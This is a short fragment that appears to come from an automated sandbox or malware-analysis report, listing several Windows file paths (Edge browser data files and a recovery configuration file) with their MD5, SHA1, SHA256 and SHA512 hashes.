SHA512 e717184db37b9f6a80f1f17801941e7e50079fe9b694ee553072de99888e343fb1b3c9acc86e8973c09df5afc91722daeb8b2274633833ab8d60ddfaab581292

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

MD5 d0737e7b5d3bf2e027231e1e54b0ae1a
SHA1 f6e86cbc6f69c47e7764534e1c84ef4025702a9d
SHA256 9e4f4bcd2cce3c1336aeacf3a16b02d49298784d9f1d9e90062bf29fc0f320af
SHA512 2a401ab0142410154566ac5527370f95b562a1ee0ca5e81ba19fd2b57a368b7e138ccfaa312b8c133e975bfe3c96ce909e07040f7d1d2ca8b678d04cd51d4e62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0d53dfc85c3bd8a972e29a28b2c8b16d
SHA1 f18b578f5a3a00f0f84acb3f009d1c85afec3e77
SHA256 5f5cd173d711d74c1d4e1beff28ae598254c4a652364a394a7ef30bb58b3db80
SHA512 14cb89b8a609cfb61a94c6f57cc8be269853b9b49d5137d8e7460f43face8836e53f12a87574738bafa74ab63f993828e5c16a20927927cadb4d61d29617c7ed

C:\Windows\System32\Recovery\ReAgent.xml

MD5 4666c057a7c38ec27cf6ccd9927f1f84
SHA1 34aca34887404b2f3c7a8a1d64868088f7fe0225
SHA256 6a9927d4a5acdaef4f6afad88edc6028b48c6df10c1170f587f22f45281fd556
SHA512 a1023c32519cdda1b1e9d0b9fd4be49307ef3e0d566b165a71b0f1e3592ff87bcc0ec5a4a45f64dd0957e5d5770426280d71d2e65c5ea70ce3a7aed59b47b800